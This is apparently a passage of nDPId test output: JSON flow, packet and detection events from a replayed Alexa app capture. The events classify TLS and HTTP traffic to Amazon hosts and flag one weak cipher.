{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1490976043873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976043873,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwUbtAAOcGVIdIFc6HrBAq2AG7pJG1BAKQQ3Bp4nASH\/5rUgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1490976043875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976043875,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJo1AAEAGJr6sECrYSBXOh6SRAbtDcGnitQQCkVAQAVe1wwAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976043814,"flow_last_seen":1490976043875,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976043875,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":409,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1665,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01281{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976043814,"flow_last_seen":1490976043941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4585,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1490976043941,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","server_names":"fls-na.amazon.ca,fls-na.amazon.com,fls-na.amazon.com.br,fls-na.amazon.com.mx","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=fls-na.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2F:16:23:0F:F8:49:12:18:49:55:48:DA:E6:59:D9:B3:BB:0E:41:8A"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044189,"flow_last_seen":1490976044189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1490976044189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044189,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8KphAAEAGHFesECrYNF7ohrJpAbvSj2UKAAAAAKAC\/\/8X6wAAAgQFtAQCCAoA9k+SAAAAAAEDAwg="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044219,"flow_last_seen":1490976044219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044219,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1490976044219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044219,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8UU1AAEAG9aGsECrYNF7ohrJqAbsS8h7YAAAAAKAC\/\/8dtwAAAgQFtAQCCAoA9k+VAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1490976044265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044265,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwK9ZAAOcGdCQ0XuiGrBAq2AG7smlcwjrL0o9lC3ASH\/7s8AAAAgQFtAEDAwY="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1490976044267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044267,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKplAAEAGHGqsECrYNF7ohrJpAbvSj2ULXMI6zFAQAVc3YgAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1490976044285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044285,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZ65AAOcGOEw0XuiGrBAq2AG7smoL+FEyEvIe2XASH\/4tIwAAAgQFtAEDAwY="} 
+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1490976044287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044287,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoUU5AAEAG9bSsECrYNF7ohrJqAbsS8h7ZC\/hRM1AQAVd3lAAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1490976044419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G7BAAEAGvmmsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/UsgAAAgQFtAQCCAoA9k+qAAAAAAEDAwg="} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044439,"flow_last_seen":1490976044439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044439,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1490976044439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044439,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8t7dAAEAGjzesECrYNF7ohsG1AFD+AvgcAAAAAKAC\/\/9LawAAAgQFtAQCCAoA9k+rAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044488,"flow_last_seen":1490976044488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044488,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1490976044488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044488,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8GDVAAEAGLrqsECrYNF7ohrJsAbtUI1eFAAAAAKAC\/\/+juwAAAgQFtAQCCAoA9k+wAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044502,"flow_last_seen":1490976044502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1490976044502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044502,"pkt":"AMDKkaPvePiC0\/vCCABFAAA807lAAEAGczWsECrYNF7ohrJtAbvCg5wLAAAAAKAC\/\/\/w0QAAAgQFtAQCCAoA9k+yAAAAAAEDAwg="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044509,"flow_last_seen":1490976044509,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044509,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1490976044509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044509,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8dBBAAEAG0t6sECrYNF7ohrJuAbv0jjuiAAAAAKAC\/\/8fLwAAAgQFtAQCCAoA9k+yAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044521,"flow_last_seen":1490976044521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976044521,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1490976044521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976044521,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pBJAAEAGotysECrYNF7ohrJvAbuLWOumAAAAAKAC\/\/\/YXQAAAgQFtAQCCAoA9k+0AAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1490976044548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjz9AAOcGELs0XuiGrBAq2ABQwbWwdDtt\/gL4HXASH\/7MNQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1490976044550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044550,"pkt":"AMDKkaPvePiC0\/vCCABFAAAot7hAAEAGj0qsECrYNF7ohsG1AFD+AvgdsHQ7blAQAVcWpwAA"} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw+cBAAOcGpjk0XuiGrBAq2AG7smyRBTVcVCNXhnASH\/5KCwAAAgQFtAEDAwY="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOIdAAOcGZ3M0XuiGrBAq2AG7sm0P1nENwoOcDHASH\/7coQAAAgQFtAEDAwY="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0BdAAOcGz+I0XuiGrBAq2AG7sm67yvGb9I47o3ASH\/7eewAAAgQFtAEDAwY="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIDxAAOcGf740XuiGrBAq2AG7sm+mtiDui1jrp3ASH\/59bgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1490976044587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044587,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoGDZAAEAGLs2sECrYNF7ohrJsAbtUI1eGkQU1XVAQAVeUfAAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07pAAEAGc0isECrYNF7ohrJtAbvCg5wMD9ZxDlAQAVcnEwAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodBFAAEAG0vGsECrYNF7ohrJuAbv0jjuju8rxnFAQAVco7QAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1490976044589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976044589,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopBNAAEAGou+sECrYNF7ohrJvAbuLWOunprYg71AQAVfH3wAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
